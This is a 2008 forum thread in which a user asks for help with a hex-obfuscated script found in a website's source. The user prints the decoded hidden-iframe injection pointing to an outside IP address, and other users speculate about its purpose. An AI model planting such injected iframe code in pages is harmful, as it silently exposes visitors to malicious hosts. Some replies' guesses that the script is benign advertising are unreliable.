# Possible malicious script found in page source - help please



## Demonixx (Jul 3, 2008)

Hello, this is my first post here so i hope i have the right place!

I visited a website earlier and found that my anti virus software blocked a site from running. I use nod32, no other software has picked this up. 

I checked out the URL and IP and found that when i tried to visit those locations i was blocked again and furthermore they are labeled as possible malicious site by Google. 

I couldn't work this out at first but when looking through the source code i found a script disguised via hex to make the user visit the blocked site through an iFrame. So when you visited the site you also unknowingly visited another through an invisible iFrame. 

Here is what was disguised via hex:


```
window.status='Done';document.write('<iframe name=d92ee530 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*67600)+'8fd22\' width=400 height=169 style=\'display: none\'></iframe>')
```
So the URL is http://58.65.232.33/gpack + random number + 8fd22

The site isn't a huge site but is well known amongst some communities. The fact that it uses hidden iFrames to make the user unknowingly visit possible malicious sites all whilst being disguised in the source code makes me very suspicious. 

Could anybody help me out and tell me what this script is doing? Could it be boosting visit numbers, stealing cookies, tracking users? 

Any help would be great, thanks.


----------



## Demonixx (Jul 3, 2008)

Edit: the final URL is : http://58.65.232.33/gpack/index.php? + random number + 8fd22

(sorry, couldn't edit original post)


----------



## jamiemac2005 (Jul 5, 2007)

It looks to me like an advertising banner, (The math.random() in the url feeds a random number to the end of the URL)... It could be a number of things...
What's suspicious about this is if it's running or not, because technically document.write(); would completely re-direct the page being viewed.

Anyway, what's the url of the site this source code is on?
(It would help if i could visualise it)

Cheers,
Jamey


----------



## Demonixx (Jul 3, 2008)

Thanks for the reply Jamey.

The site has a welcome page consisting of nothing but a static JPEG image and a HTML link to the main site, there are no adverts just an image and a link. That is it, no redirecting, no clicks no loading no nothing. 

I and friends of mine have been using the site but it was only until i purchased Nod32 that any warning appeared which was reaffirmed by the google & Firefox warnings and Nod32 again.

From the source code nothing looks untoward as it just includes meta data and benign HTML, the code that relates to the hidden iFrame which makes the user visit the malicious site is the only thing 'hidden' via hex. 

I'm just curious as to what this unwitting and unknown visit to a site could do, do you have any ideas? I know you can use iFrames for CSX amongst other things, but why would an owner and super user of a site include this in his site? That's what is guiding me towards boosted numbers etc


----------



## jamiemac2005 (Jul 5, 2007)

Hey, i "whois"ed the IP address, and found something curious; the site is hosted/assosiated with "hostfresh.com": 58.65.232.0 - 58.65.239.255

Who hosts the site you're talking about?...

anyway, as for consiquences of being redirected by this, it seems as if google&/ most anti-spyware programs which modify hosts files have blacklisted the site, so the user's are only likely to have a "this page is dangerous" page in the hidden iframe...

So i don't think there's a problem there, to be honest i've tried whatever i can to look at the site and it was near-impossible... It re-directs to a PHP based page so boosted numbers etc does make sence, the random number generation is also something to be curious about but i don't know exactly what it could be doing

Cheers,
Jamey


----------



## af3 (Jun 18, 2008)

It must be annyoing having NOD32 block sites with ads...


----------



## Demonixx (Jul 3, 2008)

Thanks for your efforts Jamey,

I've looked it up as far as i can too and haven't come to any conclusion other than it being suspicious. I think you're right about the site not reaching the user through the iframe. Still, it's very odd (to a person who doesn't know much ) . 

Anybody have any ideas?

Edit: af3, I've been using Nod32 whilst browsing many sites with ads and this is the only site (which doesn't make any effort to display ads) which has came up. Plus the site itself isn't blocked, it's the hidden iframe leading to another site that is blocked.

EDIT 2: looked the IP up on google and found that quite a few people have haad this problem so it has nothing to do with the administrator, his site is just infected its all. Thanks for your help.


----------

